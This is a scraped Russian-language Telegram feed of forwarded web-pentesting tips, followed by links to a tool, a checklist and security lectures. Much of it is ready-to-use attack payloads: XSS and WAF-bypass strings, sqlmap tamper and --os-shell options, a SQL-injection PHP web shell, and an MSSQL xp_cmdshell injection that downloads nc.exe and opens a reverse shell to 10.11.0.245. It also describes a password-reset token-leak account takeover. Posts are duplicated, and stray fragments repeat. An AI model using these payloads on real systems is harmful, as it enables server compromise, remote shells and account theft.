Forwarded from SHADOW:Group
🖇 Захват аккаунта через утечку токена сброса
Простой способ, который можно попробовать при тестировании веб-приложений:
1 - Настройте Burp на перехват запросов в браузере;
2 - Сделайте запрос на сброс пароля;
3 - Откройте электронное письмо для сброса пароля в отдельном браузере (без Burp) и скопируйте токен сброса;
4 - Попробуйте найти этот токен в истории Burp. Если он там, то вы нашли простой способ захвата учетной записи.
Таким образом, это означает, что вам на самом деле не нужно читать электронное письмо, чтобы сбросить пароль.
Вы можете выполнить сброс пароля любой учетной записи и, поскольку токен утекает в запросах, вы можете сбросить пароль, не имея доступа к почтовому ящику жертвы.
#web #ato
Простой способ, который можно попробовать при тестировании веб-приложений:
1 - Настройте Burp на перехват запросов в браузере;
2 - Сделайте запрос на сброс пароля;
3 - Откройте электронное письмо для сброса пароля в отдельном браузере (без Burp) и скопируйте токен сброса;
4 - Попробуйте найти этот токен в истории Burp. Если он там, то вы нашли простой способ захвата учетной записи.
Таким образом, это означает, что вам на самом деле не нужно читать электронное письмо, чтобы сбросить пароль.
Вы можете выполнить сброс пароля любой учетной записи и, поскольку токен утекает в запросах, вы можете сбросить пароль, не имея доступа к почтовому ящику жертвы.
#web #ato
Forwarded from SHADOW:Group
👁 Отслеживаем новые уязвимости на сайтах
Приведённый на изображении ниже код еженедельно (период можно изменить) запускает Nuclei для списка целей, а также удаляет повторяющиеся результаты, чтобы отображать только последний, актуальный результат. Если не знаешь, что такое Nuclei, посмотри эту и эту статью
Для работы также требуется httpx и anew
Нет необходимости в Cronjob. Можно запустить в
#web
Приведённый на изображении ниже код еженедельно (период можно изменить) запускает Nuclei для списка целей, а также удаляет повторяющиеся результаты, чтобы отображать только последний, актуальный результат. Если не знаешь, что такое Nuclei, посмотри эту и эту статью
Для работы также требуется httpx и anew
Нет необходимости в Cronjob. Можно запустить в
screen
на дедике.#web
Forwarded from club1337
The Swiss Army knife for automated Web Application Testing.
#Go #WebPentest #AutomatedTesting #redteaming #pentesthttps://github.com/jaeles-project/jaeles
GitHub
GitHub - jaeles-project/jaeles: The Swiss Army knife for automated Web Application Testing
The Swiss Army knife for automated Web Application Testing - jaeles-project/jaeles
Forwarded from SHADOW:Group
✅ Совет
Если вам нужно обойти WAF (брандмауэр веб-приложений), добавьте в sqlmap следующие параметры:
Если вам нужно обойти WAF (брандмауэр веб-приложений), добавьте в sqlmap следующие параметры:
--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned
Forwarded from SHADOW:Group
🖼 XSS в имени файла
Если вы нашли функцию загрузки изображения, попробуйте ввести изображение с полезной нагрузкой XSS (межсайтовый скриптинг) в имени файла, например:
Обратите внимание, что это может работать только в системах на базе UNIX, поскольку специальные символы не принимаются в качестве имени файла в Windows. Однако как отраженный XSS он должен работать повсеместно.
#web
Если вы нашли функцию загрузки изображения, попробуйте ввести изображение с полезной нагрузкой XSS (межсайтовый скриптинг) в имени файла, например:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
Обратите внимание, что это может работать только в системах на базе UNIX, поскольку специальные символы не принимаются в качестве имени файла в Windows. Однако как отраженный XSS он должен работать повсеместно.
#web
Forwarded from SHADOW:Group
📥Что можно получить, если вы загрузили..
Коротко о том, что можно получить при загрузке файлов с разными расширениями на уязвимый сервер.
#web
Коротко о том, что можно получить при загрузке файлов с разными расширениями на уязвимый сервер.
#web
Forwarded from SHADOW:Group
💉 Переход от SQL инъекции к шеллу или бэкдору
▫️Используем команду “into outfile” для записи в файл:
▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:
▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:
#web
▫️Используем команду “into outfile” для записи в файл:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
▫️Захватываем запрос в Burp Proxy и сохраняем в файл post-request, затем запускаем sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
▫️обратный шелл netcat через инъекцию mssql, когда доступен xp_cmdshell:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web
Forwarded from SHADOW:Group
📌 Методы обхода XSS фильтров
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
▫️Попробуйте двойное кодирование:
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
▫️Инъекция анкор тега без пробелов:
▫️Попробуйте обойти пробелы с помощью маркера:
▫️Попробуйте изменить метод запроса (POST вместо GET):
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
<sCRipT>alert(1)</sCRiPt>
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
<script>%0d%0aalert(1)</script>
▫️Попробуйте двойное кодирование:
%253Cscript%253Ealert(1)%253C%252Fscript%253E
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
<scr<script>ipt>alert(1);</scr</script>ipt>
▫️Инъекция анкор тега без пробелов:
<a/href="j	a	v	asc	ri	pt:alert(1)">
▫️Попробуйте обойти пробелы с помощью маркера:
<svg•onload=alert(1)>
▫️Попробуйте изменить метод запроса (POST вместо GET):
GET /?q=xss#web
POST /
q=xss
Forwarded from Investigation & Forensic TOOLS
Pentesting Web checklist.pdf
581.2 KB
Чеклист по проведению пентестов на web.
001. Безопасность веб-приложений - Эльдар Заитов
https://www.youtube.com/watch?v=rSp2cpAI4Tc&t=688
https://www.youtube.com/watch?v=rSp2cpAI4Tc&t=688
YouTube
001. Безопасность веб-приложений - Эльдар Заитов
Расскажем про устройство современного веба — микросервисную архитектуру, технологические, архитектурные уязвимости и как их предотвращать. Разберем уязвимост...
002. Безопасность мобильных приложений - Ярослав Бучнев
https://www.youtube.com/watch?v=t7GiWN2muEE&t=1
https://www.youtube.com/watch?v=t7GiWN2muEE&t=1
YouTube
002. Безопасность мобильных приложений - Ярослав Бучнев
Поговорим о типовых уязвимостях мобильных приложений и о том, как их предотвращать на iOS и Android.
008. Криптография - Евгений Сидоров
https://www.youtube.com/watch?v=_jYb5TMxWQ8&t=380
https://www.youtube.com/watch?v=_jYb5TMxWQ8&t=380
YouTube
008. Криптография - Евгений Сидоров
Расскажем про PKI и её недостатки, про TLS разных версий, атаки на них и методы ускорения протокола. Обсудим Blockchain и его применение в PKI — в технологии Certificate Transparency. Также поговорим про зависимость от точного времени и обсудим подходы к…
Игорь Бондаренко. Безопасность мобильных приложений. Что тестировать?
https://www.youtube.com/watch?v=ye66dnTwHsI
https://www.youtube.com/watch?v=ye66dnTwHsI
YouTube
Игорь Бондаренко. Безопасность мобильных приложений. Что тестировать?
Доклад Игоря Бондаренко на конференции SQA Days-17.
29-30 мая 2015, Минск.
sqadays.com
Cлайды - http://www.slideshare.net/VLDCORP/mobile-security-bondarenko
29-30 мая 2015, Минск.
sqadays.com
Cлайды - http://www.slideshare.net/VLDCORP/mobile-security-bondarenko
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #